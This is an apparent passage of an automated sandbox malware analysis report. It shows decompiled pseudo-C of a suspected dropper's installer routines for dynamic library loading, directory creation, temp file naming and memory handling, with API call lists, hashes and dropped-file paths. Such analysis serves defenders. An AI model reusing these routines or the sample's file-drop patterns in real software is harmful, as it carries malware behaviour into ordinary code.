					E00401423();
					L16:
					 *0x4524a8 =  *0x4524a8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402C39(0xfffffff0);
				 *(_t34 + 8) = E00402C39(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00405378(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x2000, 0x453000, 0x414478, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DD(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                            0x004020a5
                                                            0x004020a5
                                                            0x004020aa
                                                            0x004020b1
                                                            0x0040216c
                                                            0x004022e5
                                                            0x004022e5
                                                            0x00402ac5
                                                            0x00402ac8
                                                            0x00402ad4
                                                            0x00402ad4
                                                            0x004020c0
                                                            0x004020ca
                                                            0x004020cd
                                                            0x004020dc
                                                            0x004020e0
                                                            0x004020e6
                                                            0x004020ea
                                                            0x00402165
                                                            0x00000000
                                                            0x00402165
                                                            0x004020ec
                                                            0x004020f5
                                                            0x004020f9
                                                            0x0040213d
                                                            0x004020fb
                                                            0x004020fe
                                                            0x00402101
                                                            0x00402131
                                                            0x00402103
                                                            0x00402106
                                                            0x0040210f
                                                            0x00402111
                                                            0x00402111
                                                            0x0040210f
                                                            0x00402101
                                                            0x00402145
                                                            0x0040215a
                                                            0x0040215a
                                                            0x00000000
                                                            0x00402145
                                                            0x004020d0
                                                            0x004020d6
                                                            0x004020da
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020D0
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000,?), ref: 004053B1
                                                              • Part of subcall function 00405378: lstrlenA.KERNEL32(0040329E,Copy failed,00000000,0042CE48,7555110C,?,?,?,?,?,?,?,?,?,0040329E,00000000), ref: 004053C1
                                                              • Part of subcall function 00405378: lstrcatA.KERNEL32(Copy failed,0040329E,0040329E,Copy failed,00000000,0042CE48,7555110C), ref: 004053D4
                                                              • Part of subcall function 00405378: SetWindowTextA.USER32(Copy failed,Copy failed), ref: 004053E6
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 0040540C
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405426
                                                              • Part of subcall function 00405378: SendMessageA.USER32 ref: 00405434
                                                            • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020E0
                                                            • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020F0
                                                            • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 0040215A
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 2987980305-0
                                                            • Opcode ID: e0f3fc95b655b74265502013fc270037f478b43415bc26c37f640848bae1994c
                                                            • Instruction ID: c32ea7a8b3beed88709fb5878bffd466afe3d741a829a911a3d786ad6d955be5
                                                            • Opcode Fuzzy Hash: e0f3fc95b655b74265502013fc270037f478b43415bc26c37f640848bae1994c
                                                            • Instruction Fuzzy Hash: 30210831904215F7DF206FA48F4DAAF3A606F45359F20423BF601B61D1DBFD49819A6E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040583E Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1023 40583e-405889 CreateDirectoryA 1024 40588b-40588d 1023->1024 1025 40588f-40589c GetLastError 1023->1025 1026 4058b6-4058b8 1024->1026 1025->1026 1027 40589e-4058b2 SetFileSecurityA 1025->1027 1027->1024 1028 4058b4 GetLastError 1027->1028 1028->1026
                                                            C-Code - Quality: 100%
                                                            			E0040583E(CHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x408384;
				_v36.Group = 0x408384;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x408374;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                            0x00405849
                                                            0x0040584d
                                                            0x00405850
                                                            0x00405856
                                                            0x0040585a
                                                            0x0040585e
                                                            0x00405866
                                                            0x0040586d
                                                            0x00405873
                                                            0x0040587a
                                                            0x00405881
                                                            0x00405889
                                                            0x0040588b
                                                            0x00000000
                                                            0x0040588b
                                                            0x00405895
                                                            0x0040589c
                                                            0x004058b2
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004058b4
                                                            0x004058b8

                                                            APIs
                                                            • CreateDirectoryA.KERNELBASE(?,0000000B,00485000), ref: 00405881
                                                            • GetLastError.KERNEL32 ref: 00405895
                                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058AA
                                                            • GetLastError.KERNEL32 ref: 004058B4
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID:
                                                            • API String ID: 3449924974-0
                                                            • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                            • Instruction ID: 2f5b217c954ff7fbb4119b01485a045b77912d3f79ec2e58d5a645a6a403fb95
                                                            • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                            • Instruction Fuzzy Hash: A7010872C00219EAEF00DBA1C944BEFBBB8EF04355F00803AD945B6290E7789658CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402C39(0xfffffff0);
				_t13 = E00405C82(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405C14(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004058BB(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058D8(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E0040583E(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                            0x004015bb
                                                            0x004015c2
                                                            0x004015c5
                                                            0x004015ca
                                                            0x004015ce
                                                            0x004015d0
                                                            0x004015d8
                                                            0x004015da
                                                            0x004015dc
                                                            0x004015e0
                                                            0x004015e3
                                                            0x004015fb
                                                            0x004015fc
                                                            0x004015e5
                                                            0x004015e5
                                                            0x004015e8
                                                            0x00000000
                                                            0x004015f3
                                                            0x004015f4
                                                            0x004015f4
                                                            0x004015e8
                                                            0x00401603
                                                            0x0040160a
                                                            0x00401617
                                                            0x00401617
                                                            0x0040160c
                                                            0x0040160d
                                                            0x00401615
                                                            0x00000000
                                                            0x00000000
                                                            0x00401615
                                                            0x0040160a
                                                            0x0040161a
                                                            0x0040161d
                                                            0x0040161f
                                                            0x00401620
                                                            0x004015d0
                                                            0x00401627
                                                            0x00401652
                                                            0x004022e5
                                                            0x00401629
                                                            0x0040162b
                                                            0x00401636
                                                            0x0040163c
                                                            0x00401644
                                                            0x0040164a
                                                            0x0040164a
                                                            0x00401644
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                              • Part of subcall function 00405C82: CharNextA.USER32(?), ref: 00405C90
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                              • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                            • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                              • Part of subcall function 0040583E: CreateDirectoryA.KERNELBASE(?,0000000B,00485000), ref: 00405881
                                                            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes,00000000,00000000,000000F0), ref: 0040163C
                                                            Strings
                                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes, xrefs: 00401631
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes
                                                            • API String ID: 1892508949-4054825685
                                                            • Opcode ID: e8121ef37ac2678a0a0bc0c1c4f9116077d9be17d0c59d1929bed76540fc0f84
                                                            • Instruction ID: b8fbfff880949599704ab61e7222ee5c33c04614f7d3c61f622f7c10b59fc28f
                                                            • Opcode Fuzzy Hash: e8121ef37ac2678a0a0bc0c1c4f9116077d9be17d0c59d1929bed76540fc0f84
                                                            • Instruction Fuzzy Hash: 21110431508141ABDF307BA54D405BF27B49A96324B28453FF9D1B22E3DA3D4942AA3E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405E19 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405E19(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3d4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                            0x00405e1d
                                                            0x00405e23
                                                            0x00405e24
                                                            0x00405e24
                                                            0x00405e29
                                                            0x00405e2a
                                                            0x00405e2d
                                                            0x00405e37
                                                            0x00405e44
                                                            0x00405e47
                                                            0x00405e4f
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e53
                                                            0x00000000
                                                            0x00000000
                                                            0x00405e55
                                                            0x00000000
                                                            0x00405e55
                                                            0x00000000

                                                            APIs
                                                            • GetTickCount.KERNEL32(75572754,00485000,?,004033B1,00483000,00485000,00485000,00485000,00485000,00485000,00485000,00403690,?,00000007,00000009,0000000B), ref: 00405E2D
                                                            • GetTempFileNameA.KERNEL32(0000000B,?,00000000,?), ref: 00405E47
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: nsa
                                                            • API String ID: 1716503409-2209301699
                                                            • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                            • Instruction ID: db84433a099d66a6ad53f3418d19e52f8fbd3804b66164b4918815a523437c08
                                                            • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                            • Instruction Fuzzy Hash: 9CF0A736348208BBEB109F56ED04B9B7B9CDF91B50F10C03BFA84DB180D6B5DA548798
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401B87 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E00401B87(void* __ebx, void* __edx) {
				intOrPtr _t7;
				void* _t8;
				void _t11;
				void* _t13;
				void* _t21;
				void* _t24;
				void* _t30;
				void* _t33;
				void* _t34;
				char* _t36;
				void* _t37;

				_t27 = __ebx;
				_t7 =  *((intOrPtr*)(_t37 - 0x20));
				_t30 =  *0x414478; // 0x0
				if(_t7 == __ebx) {
					if(__edx == __ebx) {
						_t8 = GlobalAlloc(0x40, 0x2004); // executed
						_t34 = _t8;
						_t4 = _t34 + 4; // 0x4
						E004062EA(__ebx, _t30, _t34, _t4,  *((intOrPtr*)(_t37 - 0x28)));
						_t11 =  *0x414478; // 0x0
						 *_t34 = _t11;
						 *0x414478 = _t34;
					} else {
						if(_t30 == __ebx) {
							 *((intOrPtr*)(_t37 - 4)) = 1;
						} else {
							_t2 = _t30 + 4; // 0x4
							E00406257(_t33, _t2);
							_push(_t30);
							 *0x414478 =  *_t30;
							GlobalFree();
						}
					}
					goto L15;
				} else {
					while(1) {
						_t7 = _t7 - 1;
						if(_t30 == _t27) {
							break;
						}
						_t30 =  *_t30;
						if(_t7 != _t27) {
							continue;
						} else {
							if(_t30 == _t27) {
								break;
							} else {
								_t32 = _t30 + 4;
								_t36 = "C:\\Users\\Albus\\Raped\\Forbundskansleres.nav";
								E00406257(_t36, _t30 + 4);
								_t21 =  *0x414478; // 0x0
								E00406257(_t32, _t21 + 4);
								_t24 =  *0x414478; // 0x0
								_push(_t36);
								_push(_t24 + 4);
								E00406257();
								L15:
								 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t37 - 4));
								_t13 = 0;
							}
						}
						goto L17;
					}
					_push(0x200010);
					_push(E004062EA(_t27, _t30, _t33, _t27, 0xffffffe8));
					E0040596D();
					_t13 = 0x7fffffff;
				}
				L17:
				return _t13;
			}














                                                            0x00401b87
                                                            0x00401b87
                                                            0x00401b8a
                                                            0x00401b92
                                                            0x00401bda
                                                            0x00401c08
                                                            0x00401c11
                                                            0x00401c13
                                                            0x00401c17
                                                            0x00401c1c
                                                            0x00401c21
                                                            0x00401c23
                                                            0x00401bdc
                                                            0x00401bde
                                                            0x004027c8
                                                            0x00401be4
                                                            0x00401be4
                                                            0x00401be9
                                                            0x00401bf0
                                                            0x00401bf1
                                                            0x00401bf6
                                                            0x00401bf6
                                                            0x00401bde
                                                            0x00000000
                                                            0x00401b94
                                                            0x00401b94
                                                            0x00401b94
                                                            0x00401b97
                                                            0x00000000
                                                            0x00000000
                                                            0x00401b9d
                                                            0x00401ba1
                                                            0x00000000
                                                            0x00401ba3
                                                            0x00401ba5
                                                            0x00000000
                                                            0x00401bab
                                                            0x00401bab
                                                            0x00401bae
                                                            0x00401bb5
                                                            0x00401bba
                                                            0x00401bc4
                                                            0x00401bc9
                                                            0x00401bce
                                                            0x00401bd2
                                                            0x00402931
                                                            0x00402ac5
                                                            0x00402ac8
                                                            0x00402ace
                                                            0x00402ace
                                                            0x00401ba5
                                                            0x00000000
                                                            0x00401ba1
                                                            0x0040237c
                                                            0x00402389
                                                            0x0040238a
                                                            0x0040238f
                                                            0x0040238f
                                                            0x00402ad0
                                                            0x00402ad4

                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 00401BF6
                                                            • GlobalAlloc.KERNELBASE(00000040,00002004), ref: 00401C08
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree
                                                            • String ID: C:\Users\user\Raped\Forbundskansleres.nav
                                                            • API String ID: 3394109436-1324439229
                                                            • Opcode ID: ef51e244c9b72e316efee3d40e69dbbd1feb408e9613f1d734bb71ffb8df92b4
                                                            • Instruction ID: d2b80980e39293206c5e6d60a34a0b6bee3a2bd2daddf4a89311edae202359af
                                                            • Opcode Fuzzy Hash: ef51e244c9b72e316efee3d40e69dbbd1feb408e9613f1d734bb71ffb8df92b4
                                                            • Instruction Fuzzy Hash: 3E215E72600100A7E720FBA4DD89D9E73A59B89319B25443FF152F72D1D77CD8518B2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 59%
                                                            			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x452450;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x44e40c =  *0x44e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x44e40c, 0x7530,  *0x44e3f4), 0); // executed
					}
				}
				return 0;
			}











                                                            0x0040138a
                                                            0x004013fa
                                                            0x0040139b
                                                            0x004013a0
                                                            0x00000000
                                                            0x00000000
                                                            0x004013a2
                                                            0x004013a3
                                                            0x004013ad
                                                            0x00000000
                                                            0x00401404
                                                            0x004013b0
                                                            0x004013b7
                                                            0x004013bd
                                                            0x004013be
                                                            0x004013c0
                                                            0x004013c2
                                                            0x004013b9
                                                            0x004013b9
                                                            0x004013ba
                                                            0x004013ba
                                                            0x004013c9
                                                            0x004013cb
                                                            0x004013f4
